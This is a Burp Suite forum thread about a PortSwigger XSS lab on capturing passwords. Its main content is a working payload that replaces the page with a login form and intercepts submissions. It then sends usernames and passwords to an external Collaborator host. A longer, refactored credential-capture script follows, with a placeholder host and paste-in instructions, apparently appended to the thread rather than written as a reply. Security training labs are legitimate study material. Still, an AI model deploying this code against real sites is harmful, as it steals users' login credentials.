The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Exploiting cross-site scripting to capture passwords

slt | Last updated: Jul 16, 2024 02:29PM UTC

Hello! I think the description of what the simulated victim does should be updated on this lab. I used XSS to replace the current page content with the login form (after fetching it dynamically), then hook on the submit event to put the submission on hold while exfiltrating the credentials (assuming the simulated victim would try to log in). It works as expected but would not solve the challenge. After looking at the solution, I'm quite disappointed! I feel my solution is way more subtle and nice and should work with the simulated victim! Or at the very least, the description could be updated! Here is the payload I used:

    <script>
    // Fetch the same-origin /login page (the blog post URL is /post?postId=N,
    // so swapping the path gives /login?postId=N, which the login page ignores).
    fetch(location.href.toString().replace('/post?', '/login?'))
      .then(resp => resp.text())
      .then(html => {
        // Parse the login page and swap its main container into the current page.
        const parser = new DOMParser();
        let current_container = document.querySelector('div.container.is-page');
        let doc = parser.parseFromString(html, 'text/html');
        let doc_cont = doc.querySelector('div.container.is-page');
        current_container.innerHTML = doc_cont.innerHTML;

        // Hold the real login until the credentials have been sent out.
        document.forms[0].addEventListener('submit', (evt) => {
          let form = document.forms[0];
          evt.preventDefault();
          let username = form.elements.username.value,
              password = form.elements.password.value;
          fetch("https://3hlexh2r5rea50zjl8l51ycksby2msah.oastify.com/?username="
                + encodeURIComponent(username) + "&password=" + encodeURIComponent(password))
            // A cross-origin request to the Collaborator host usually rejects in
            // the page (no CORS headers) even though it was sent, so release the
            // submission in finally() rather than only in catch(): otherwise the
            // login would never go through if the response did allow CORS.
            // form.submit() does not re-fire the submit event, so there is no loop.
            .finally(() => { console.log("exfiltrated!"); form.submit(); });
        });
      })
      .catch(e => console.log(`ERROR: ${e}`));
    </script>

Thank you :-)

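The "hold the login, exfiltrate, then release it" pattern from the post above, as an added example that is not part of the forum post or of the PortSwigger lab. The timing logic is split into plain functions so it can be exercised in Node without a DOM; the browser wiring only runs when a document exists. It generalises the post in one respect: the real submission is released whether the cross-origin request fulfilled or rejected, because a fetch to an OAST host normally rejects in the page (no Access-Control-Allow-Origin) even though the request was already sent. EXFIL_BASE is a placeholder for your own Collaborator host, the form is assumed to carry `username` and `password` inputs as in the lab, and every function name is this example's own.

```javascript
// Added example (not from the forum post or the lab): credential capture via
// XSS with the release-after-exfiltration logic factored out for testing.
//
// Assumptions: EXFIL_BASE is a placeholder for your own Collaborator/OAST
// host; the target page has a /login form with `username` and `password`
// inputs, as in the lab; all function names are this example's own.

const EXFIL_BASE = "https://YOUR-ID.oastify.com/"; // placeholder, replace

// Build the callback URL. URLSearchParams percent-encodes '&', '=', '#' and
// non-ASCII, so a password such as "p&ss=w#rd" survives as one parameter.
function buildExfilUrl(base, username, password) {
  const u = new URL(base);
  u.searchParams.set("username", username);
  u.searchParams.set("password", password);
  return u.toString();
}

// What the listener side sees: decode the query back into credentials.
function parseExfilRequest(requestUrl) {
  const u = new URL(requestUrl);
  return {
    username: u.searchParams.get("username"),
    password: u.searchParams.get("password"),
  };
}

// Send the credentials, then release the real submission no matter how the
// cross-origin request settled. Releasing only in .catch() would skip the
// login whenever the response happened to carry CORS headers.
// `send` is fetch-like (returns a promise); `submit` releases the form.
// Resolves to true if `send` fulfilled, false if it rejected.
async function exfiltrateThenSubmit(url, send, submit) {
  let fulfilled = false;
  try {
    // no-cors: opaque response instead of a rejection for cross-origin hosts;
    // keepalive: let the request complete even if the page navigates away.
    await send(url, { mode: "no-cors", keepalive: true });
    fulfilled = true;
  } catch (_) {
    // Expected for cross-origin targets without CORS headers; already sent.
  } finally {
    submit();
  }
  return fulfilled;
}

// Browser wiring: swap the current page content for the same-origin /login
// form, then return that form so its submit event can be hooked.
async function replacePageWithLoginForm(containerSelector) {
  const html = await (await fetch("/login")).text();
  const doc = new DOMParser().parseFromString(html, "text/html");
  const target = document.querySelector(containerSelector);
  target.innerHTML = doc.querySelector(containerSelector).innerHTML;
  return document.forms[0];
}

function installCaptureHook(form, send = (u, o) => fetch(u, o)) {
  form.addEventListener("submit", (evt) => {
    evt.preventDefault(); // hold the real POST
    const url = buildExfilUrl(
      EXFIL_BASE,
      form.elements.username.value,
      form.elements.password.value
    );
    // form.submit() does not re-fire the submit event, so there is no loop.
    exfiltrateThenSubmit(url, send, () => form.submit());
  });
}

// Only runs inside a browser; Node has no document.
if (typeof document !== "undefined") {
  replacePageWithLoginForm("div.container.is-page")
    .then(installCaptureHook)
    .catch((e) => console.log(`ERROR: ${e}`));
}
```

In a real test you would paste the whole block inside a `<script>` tag in the injection point and watch the Collaborator client for the callback; the `send` parameter exists so the release logic can be checked against both a rejecting and a fulfilling request without a browser.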
Ben, PortSwigger Agent | Last updated: Jul 17, 2024 09:48AM UTC